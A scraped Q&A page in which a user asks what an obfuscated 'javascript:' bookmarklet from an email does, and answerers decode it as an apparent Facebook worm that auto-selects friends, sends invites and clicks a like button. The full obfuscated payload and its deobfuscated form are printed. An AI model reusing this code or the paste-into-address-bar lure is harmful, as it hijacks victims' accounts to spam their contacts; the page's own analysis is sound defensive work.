开发者

What does this code do

Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ...

javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100开发者_运维问答[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();

Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ...

PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.

But ... Could someone tell me what it does?


I haven't decoded completely the code, but here's a couple of hints to it.

The variable _0xc100 defines an array of strings. The character are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \x76 equals "v".

You can safely alert(_0xc100); to see it in plain text.

var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79", 
      "\x73\x74\x79\x6C\x65", 
      "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
      "\x68\x69\x64\x64\x65\x6E",
      "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
      "\x76\x61\x6C\x75\x65",
      "\x63\x6C\x69\x63\x6B",
      "\x73\x75\x67\x67\x65\x73\x74",
      "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
      "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
      "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
      "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
      "\x6C\x69\x6B\x65\x6D\x65"];

translates to an array containing these keywords

visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme

Now, the following statements (DON'T EXECUTE THOSE) use these keywords to actually execute functions.

For instance:

d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];

is equivalent to (d is defined as document and mw is defined at the top)

document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";

which hides an element called app125879300771588_mwrapper

the following instructions give

document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;

which copies the content of app125879300771588_jop into app125879300771588_jode

and

document.getElementById("suggest").click();

which I guess clicks some "suggest" button.

Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)

They translate to

setTimeout(function () {
    select_all();
     }, 5000);

Which I assume selects all your friends...

setTimeout(function () 
    {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
    }, 5000);

... send them invites

setTimeout(function () 
    {
    document.getElementById("likeme").click();
    document.getElementById("app125879300771588_ifo").innerHTML =
       document.getElementById("app125879300771588_ifc").value;
    }, 5000);

... and presses a like button

Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.


a = 'app125879300771588_jop';
b = 'app125879300771588_jode';
ifc = 'app125879300771588_ifc';
ifo = 'app125879300771588_ifo';
mw = 'app125879300771588_mwrapper';
var _0xc100 = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "click", "suggest", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "likeme"];
d = document;
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
d[_0xc100[2]](a)[_0xc100[4]] = d[_0xc100[2]](b)[_0xc100[5]];
d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();
setTimeout(function () {
    fs[_0xc100[8]]();
}, 5000);
setTimeout(function () {
    SocialGraphManager[_0xc100[11]](_0xc100[9], _0xc100[10]);
}, 5000);
setTimeout(function () {
    d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();
    d[_0xc100[2]](ifo)[_0xc100[4]] = d[_0xc100[2]](ifc)[_0xc100[5]];
}, 5000);

This is most likely an adaption of one of many Facebook worms that sends itself to all of your friends.

Looke here for a similar question.

Other versions of this used p.a.c.k.e.r to obfuscate, and these could easily be deobfuscated by running the p.a.c.k.e.r code through http://jsbeautifier.org/


It's an obfuscated bookmarklet. You can unobfuscate it (carefully) to see the actual Javascript it will run. If you don't have a powerful need to, though, probably not worth bothering. I'd bin it and check with my friend to see if it really is coming from him/her, and if so, why.

0

上一篇:

下一篇:

精彩评论

暂无评论...
验证码 换一张
取 消

最新问答

问答排行榜